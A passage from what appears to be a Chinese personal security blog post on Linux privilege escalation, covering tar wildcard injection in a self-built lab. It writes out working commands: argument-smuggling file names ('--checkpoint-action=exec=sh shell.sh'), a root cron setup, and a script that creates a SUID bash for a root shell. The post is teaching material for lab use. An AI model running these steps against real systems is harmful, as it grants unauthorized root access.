<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>tar -czf /tmp/backup.tar.gz *</span></span></code></pre>
<p>他的意思是把当前目录下的所有文件打包，但是在Linux shell中，<code>*</code>会首先被shell展开成当前目录下的为文件名，假设目录下有这些文件：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>a.txt</span></span>
<span class="line"><span>b.txt</span></span>
<span class="line"><span>--checkpoint=1</span></span>
<span class="line"><span>--checkpoint-action=exec=sh shell.sh</span></span></code></pre>
<p>那么上述命令实际上会变成类似：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>tar -czf /tmp/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh shell.sh a.txt b.txt</span></span></code></pre>
<p>然而</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>--checkpoint=1</span></span>
<span class="line"><span>--checkpoint-action=exec=sh shell.sh</span></span></code></pre>
<p>这两个文件会被<code>tar</code>当作参数而不是普通文件名</p>
<p>其中<code>--checkpoint-action=exec=sh shell.sh</code>会让<code>tar</code>执行<code>sh shell.sh</code>，如果这个<code>tar</code>是由root的计划任务执行的，那么<code>shell.sh</code>也会以root执行</p>
<p>其需要满足：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>1. 有 root 或高权限用户执行的脚本</span></span>
<span class="line"><span>2. 脚本中使用了通配符 *</span></span>
<span class="line"><span>3. 通配符作用的目录普通用户可写</span></span>
<span class="line"><span>4. 使用的命令会把特殊文件名当作参数</span></span>
<span class="line"><span>5. 普通用户能创建特殊文件名</span></span></code></pre>
<h3 id="本地靶场搭建-3"><a class="anchor" href="#本地靶场搭建-3">#</a> 本地靶场搭建</h3>
<p>沿用suiduser低权限用户</p>
<p>首先我们创建一个普通用户可写的目录：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>sudo mkdir -p /opt/wildcard-lab/input</span></span>
<span class="line"><span>sudo chmod 777 /opt/wildcard-lab/input</span></span>
<span class="line"><span>ls -ld /opt/wildcard-lab/input</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/44.png" class=""></p>
<p>这样root脚本会用<code>*</code>代替这个目录的所有文件，而普通用户可以往这个目录里写文件</p>
<p>创建root备份脚本</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat &#x3C;&#x3C; 'EOF' | sudo tee /opt/wildcard-lab/backup.sh</span></span>
<span class="line"><span>#!/bin/bash</span></span>
<span class="line"><span>cd /opt/wildcard-lab/input</span></span>
<span class="line"><span>tar -czf /tmp/wildcard-backup.tar.gz *</span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>sudo chmod 755 /opt/wildcard-lab/backup.sh</span></span>
<span class="line"><span>ls -l /opt/wildcard-lab/backup.sh</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/45.png" class=""></p>
<p>这个执行脚本与之前提到的777不同之处在于，在通配符提权中我们不需要对执行脚本做修改</p>
<p>接下来我们配置计划任务：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat &#x3C;&#x3C; 'EOF' | sudo tee /etc/cron.d/wildcard-lab</span></span>
<span class="line"><span>* * * * * root /opt/wildcard-lab/backup.sh</span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>sudo chmod 644 /etc/cron.d/wildcard-lab</span></span>
<span class="line"><span>cat /etc/cron.d/wildcard-lab</span></span></code></pre>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/46.png" class=""></p>
<h3 id="提权流程-5"><a class="anchor" href="#提权流程-5">#</a> 提权流程</h3>
<p>接下来我们以suiduser身份去实现提权</p>
<p>真实渗透场景我们还是需要先查看计划任务文件：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat /etc/cron.d/wildcard-lab</span></span>
<span class="line"><span>或其他的类似于</span></span>
<span class="line"><span>cat /etc/cron*</span></span></code></pre>
<p>我们进入可写目录<code>/opt/wildcard-lab/input</code>创建一个被root执行的脚本<code>shell.sh</code>并赋予其执行权限：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>cat > shell.sh &#x3C;&#x3C; 'EOF'</span></span>
<span class="line"><span>#!/bin/bash</span></span>
<span class="line"><span>cp /bin/bash /tmp/rootbash</span></span>
<span class="line"><span>chmod 4755 /tmp/rootbash</span></span>
<span class="line"><span>EOF</span></span>
<span class="line"><span></span></span>
<span class="line"><span>chmod +x shell.sh</span></span></code></pre>
<p>依然是复制<code>/bin/bash</code>到<code>/tmp/rootbash</code>，然后给复制后的文件设置SUID权限</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/47.png" class=""></p>
<p>防止之前的复制文件对本次实验结果产生干扰我们先删除<code>/tmp/rootbash</code></p>
<p>接下来我们需要创建特殊文件名，使得计划任务在执行脚本的时候将特殊文件名当作参数：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>touch -- "--checkpoint=1"</span></span>
<span class="line"><span>touch -- "--checkpoint-action=exec=sh shell.sh"</span></span></code></pre>
<p>这里的<code>--</code>表示后面的内容都当做文件名而不是参数</p>
<p><code>ls -la</code>可以看到：</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/48.png" class=""></p>
<p>等待一分钟之后我们尝试执行<code>ls -l /tmp/rootbash</code></p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/49.png" class=""></p>
<p>接下来我们就可以执行<code>/tmp/rootbash -p</code>实现提权了</p>
<p><img loading="lazy" src="/2026/06/19/Linux%E6%8F%90%E6%9D%83/50.png" class=""></p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-06-21 19:46:24" itemprop="dateModified" datetime="2026-06-21T19:46:24+08:00">2026-06-21</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>ZLARYY<i class="ic i-at"><em>@</em></i>欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~</li><li class="link"><strong>本文链接：</strong><a href="https://zlaryy.top/2026/06/19/Linux%E6%8F%90%E6%9D%83/" title="Linux提权">https://zlaryy.top/2026/06/19/Linux提权/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/06/18/SQL%E6%8F%90%E6%9D%83/" rel="prev" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture5.webp" title="SQL提权"><span class="type">上一篇</span><h3>SQL提权</h3></a></div><div class="item right"></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#linux%E6%8F%90%E6%9D%83%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0%E4%B8%AD"><span class="toc-number">1.</span> <span class="toc-text"> Linux提权（持续更新中......）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#linux%E6%9D%83%E9%99%90%E6%A8%A1%E5%9E%8B"><span class="toc-number">1.1.</span> <span class="toc-text"> Linux权限模型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#etcpasswd"><span class="toc-number">1.1.1.</span> <span class="toc-text"> &#x2F;etc&#x2F;passwd</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E4%BD%8D"><span class="toc-number">1.1.2.</span> <span class="toc-text"> 权限位</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E7%BB%84"><span class="toc-number">1.1.3.</span> <span class="toc-text"> 用户组</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid-sgid-sticky-bit"><span class="toc-number">1.1.4.</span> <span class="toc-text"> SUID、SGID、Sticky Bit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9B%E7%A8%8B%E6%9D%83%E9%99%90"><span class="toc-number">1.1.5.</span> <span class="toc-text"> 进程权限</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#suid%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.</span> <span class="toc-text"> SUID提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA"><span class="toc-number">1.2.1.</span> <span class="toc-text"> 本地靶场搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bash%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.2.</span> <span class="toc-text"> bash提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#find%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.3.</span> <span class="toc-text"> find提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#vim%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.4.</span> <span class="toc-text"> vim提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#python%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.5.</span> <span class="toc-text"> python提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#path%E8%B7%AF%E5%BE%84%E5%8A%AB%E6%8C%81"><span class="toc-number">1.2.6.</span> <span class="toc-text"> PATH路径劫持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%8F%90%E6%9D%83"><span class="toc-number">1.2.7.</span> <span class="toc-text"> 命令注入提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sudo%E6%8F%90%E6%9D%83"><span class="toc-number">1.3.</span> <span class="toc-text"> SUDO提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%B5%8B%E8%AF%95vim"><span class="toc-number">1.3.1.</span> <span class="toc-text"> 本地靶场测试(vim)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%B5%81%E7%A8%8B"><span class="toc-number">1.3.2.</span> <span class="toc-text"> 提权流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%B5%8B%E8%AF%95find"><span class="toc-number">1.3.3.</span> <span class="toc-text"> 本地靶场测试(find)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%B5%81%E7%A8%8B-2"><span class="toc-number">1.3.4.</span> <span class="toc-text"> 提权流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BApython3"><span class="toc-number">1.3.5.</span> <span class="toc-text"> 本地靶场搭建(python3)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%B5%81%E7%A8%8B-3"><span class="toc-number">1.3.6.</span> <span class="toc-text"> 提权流程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-number">1.4.</span> <span class="toc-text"> 计划任务提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA-2"><span class="toc-number">1.4.1.</span> <span class="toc-text"> 本地靶场搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%B5%81%E7%A8%8B-4"><span class="toc-number">1.4.2.</span> <span class="toc-text"> 提权流程</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%80%9A%E9%85%8D%E7%AC%A6%E8%BF%9B%E8%A1%8C%E6%8F%90%E6%9D%83"><span class="toc-number">1.5.</span> <span class="toc-text"> 利用通配符进行提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA-3"><span class="toc-number">1.5.1.</span> <span class="toc-text"> 本地靶场搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%B5%81%E7%A8%8B-5"><span class="toc-number">1.5.2.</span> <span class="toc-text"> 提权流程</span></a></li></ol></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="ZLARYY" src="/assets/avertar.png"/><p class="name" itemprop="name">ZLARYY</p><div class="description" itemprop="description">Web安全 / CTF / 个人学习笔记</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">16</span><span class="name">文章</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/ZLARYY123" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;ZLARYY123"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li><li class="item"><a href="/essay/" rel="section"><i class="ic i-calendar"></i>essay</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/06/18/SQL%E6%8F%90%E6%9D%83/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/10/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/">flask的session伪造与filter-chain</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/11/SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/">SSTI模板注入</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/28/RCE/">RCE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/07/XXE/">XXE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/16/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">php反序列化</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/23/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/">信息搜集</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/">低版本php下信息泄露的CVE漏洞与反弹shell</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/06/19/Linux%E6%8F%90%E6%9D%83/">Linux提权</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/12/SSRF/">SSRF</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">ZLARYY @ ZLARYY</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">384k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">5:49</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/06/19/Linux提权/`,
    favicon: {
        show: `ZLARYY`,
        hide: `ZLARYY`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script><!-- hexo injector body_end start -->
<script id="post-stats">
(function () {
  var API_NAME = 'ZLARYYPostStats';
  var BOX_SELECTOR = '.post-stats-box';
  var COUNT_LIMIT = 9999;

  if (window[API_NAME] && typeof window[API_NAME].run === 'function') {
    window[API_NAME].run();
    return;
  }

  function isPostPage() {
    return !!(window.LOCAL && window.LOCAL.ispost) || !!document.querySelector('article.post');
  }

  function storageKey(prefix) {
    return prefix + window.location.pathname;
  }

  function getStorageValue(storage, key) {
    try {
      return storage.getItem(key);
    } catch (error) {
      return null;
    }
  }

  function setStorageValue(storage, key, value) {
    try {
      storage.setItem(key, value);
    } catch (error) {}
  }

  function removeStorageValue(storage, key) {
    try {
      storage.removeItem(key);
    } catch (error) {}
  }

  function readCount(key) {
    var raw = getStorageValue(window.localStorage, key);
    var value = raw === null || raw === '' ? 0 : Number(raw);

    if (!Number.isInteger(value) || value < 0 || value > COUNT_LIMIT) {
      value = 0;
      setStorageValue(window.localStorage, key, '0');
    }

    return value;
  }

  function writeCount(key, value) {
    setStorageValue(window.localStorage, key, String(value));
  }

  function bumpViewCount() {
    var countKey = storageKey('zlaryy_view_count_');
    var sessionKey = storageKey('zlaryy_viewed_session_');
    var count = readCount(countKey);

    if (getStorageValue(window.sessionStorage, sessionKey) !== '1') {
      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      writeCount(countKey, count);
      setStorageValue(window.sessionStorage, sessionKey, '1');
    }

    return count;
  }

  function readLikeCount() {
    return readCount(storageKey('zlaryy_like_count_'));
  }

  function hasLiked() {
    return getStorageValue(window.localStorage, storageKey('zlaryy_liked_')) === '1';
  }

  function saveLikeState(count, liked) {
    writeCount(storageKey('zlaryy_like_count_'), count);
    if (liked) {
      setStorageValue(window.localStorage, storageKey('zlaryy_liked_'), '1');
    } else {
      removeStorageValue(window.localStorage, storageKey('zlaryy_liked_'));
    }
  }

  function clearRewardNodes() {
    document.querySelectorAll('.reward').forEach(function (reward) {
      reward.innerHTML = '';
      reward.classList.add('post-stats-host');
      reward.removeAttribute('style');
      reward.setAttribute('aria-label', 'post stats');
    });
  }

  function findInsertTarget() {
    var reward = document.querySelector('article.post .reward, .reward');
    if (reward) return { parent: reward, before: null };

    var footer = document.querySelector('article.post > footer');
    if (footer && footer.parentNode) return { parent: footer.parentNode, before: footer };

    var article = document.querySelector('article.post');
    if (article) return { parent: article, before: null };

    return null;
  }

  function createStatsBox(viewCount, likeCount, liked) {
    var box = document.createElement('div');
    box.className = 'post-stats-box';
    box.innerHTML = [
      '<button class="post-view-count" type="button" disabled aria-disabled="true">',
      '&#128065; &#x770b;&#x8fc7; <span class="local-view-count">' + viewCount + '</span> &#x6b21;',
      '</button>',
      '<button class="post-like-btn' + (liked ? ' liked' : '') + '" type="button" aria-pressed="' + (liked ? 'true' : 'false') + '">',
      '<span class="post-like-label">' + (liked ? '&#x5df2;&#x70b9;&#x8d5e;' : '&#x70b9;&#x8d5e;') + '</span> ',
      '<span class="local-like-count">' + likeCount + '</span>',
      '</button>'
    ].join('');

    return box;
  }

  function updateLikeButton(button, count, liked) {
    var labelNode = button.querySelector('.post-like-label');
    var countNode = button.querySelector('.local-like-count');

    if (labelNode) labelNode.textContent = liked ? '\u5df2\u70b9\u8d5e' : '\u70b9\u8d5e';
    if (countNode) countNode.textContent = String(count);

    button.classList.toggle('liked', liked);
    button.setAttribute('aria-pressed', liked ? 'true' : 'false');
  }

  function bindLikeButton(box) {
    var button = box.querySelector('.post-like-btn');
    if (!button || button.dataset.bound === 'true') return;

    updateLikeButton(button, readLikeCount(), hasLiked());

    button.dataset.bound = 'true';
    button.addEventListener('click', function () {
      var count = readLikeCount();

      if (hasLiked()) {
        count = Math.max(0, count - 1);
        saveLikeState(count, false);
        updateLikeButton(button, count, false);
        return;
      }

      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      saveLikeState(count, true);
      updateLikeButton(button, count, true);
    });
  }

  function renderStats() {
    if (!isPostPage()) return;

    clearRewardNodes();

    var viewCount = bumpViewCount();
    var likeCount = readLikeCount();
    var liked = hasLiked();
    var box = document.querySelector(BOX_SELECTOR);

    if (!box) {
      var target = findInsertTarget();
      if (!target) return;

      box = createStatsBox(viewCount, likeCount, liked);
      target.parent.insertBefore(box, target.before);
    }

    var viewNode = box.querySelector('.local-view-count');
    var likeNode = box.querySelector('.local-like-count');
    var likeButton = box.querySelector('.post-like-btn');

    if (viewNode) viewNode.textContent = String(viewCount);
    if (likeNode) likeNode.textContent = String(likeCount);
    if (likeButton) {
      updateLikeButton(likeButton, likeCount, liked);
    }

    bindLikeButton(box);
  }

  function runPostStats() {
    window.setTimeout(renderStats, 0);
  }

  window[API_NAME] = {
    run: runPostStats
  };

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', runPostStats);
  } else {
    runPostStats();
  }

  document.addEventListener('pjax:complete', runPostStats);
})();
</script>
  
<script>
(function () {
  function addBeian() {
    const footerStatus = document.querySelector('#footer .status');
    if (!footerStatus) return;

    if (document.querySelector('.footer-beian')) return;

    const beian = document.createElement('div');
    beian.className = 'footer-beian';
    beian.innerHTML = '<a href="https://beian.miit.gov.cn/" target="_blank" rel="noopener">蜀ICP备2026016552号-1</a>';

    footerStatus.appendChild(beian);
  }

  addBeian();
  document.addEventListener('pjax:complete', addBeian);
})();
</script>
  <script>
(function () {
  function fixText(text) {
    if (!text) return text;
    text = text.replace(/\([`´]?Д[`´]?\)大変だ!/g, "ZLARYY");
    text = text.replace(/大変だ!/g, "ZLARYY");
    return text;
  }

  function replaceText(root) {
    root = root || document.body;
    if (!root) return;

    var walker = document.createTreeWalker(root, NodeFilter.SHOW_TEXT, null, false);
    var node;

    while ((node = walker.nextNode())) {
      var oldText = node.nodeValue;
      var newText = fixText(oldText);
      if (newText !== oldText) node.nodeValue = newText;
    }
  }

  function init() {
    replaceText(document.body);

    var observer = new MutationObserver(function (mutations) {
      mutations.forEach(function (mutation) {
        mutation.addedNodes.forEach(function (node) {
          if (node.nodeType === 1) {
            replaceText(node);
          } else if (node.nodeType === 3) {
            node.nodeValue = fixText(node.nodeValue);
          }
        });
      });
    });

    observer.observe(document.body, {
      childList: true,
      subtree: true
    });
  }

  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", init);
  } else {
    init();
  }
})();
</script><!-- hexo injector body_end end --></body></html>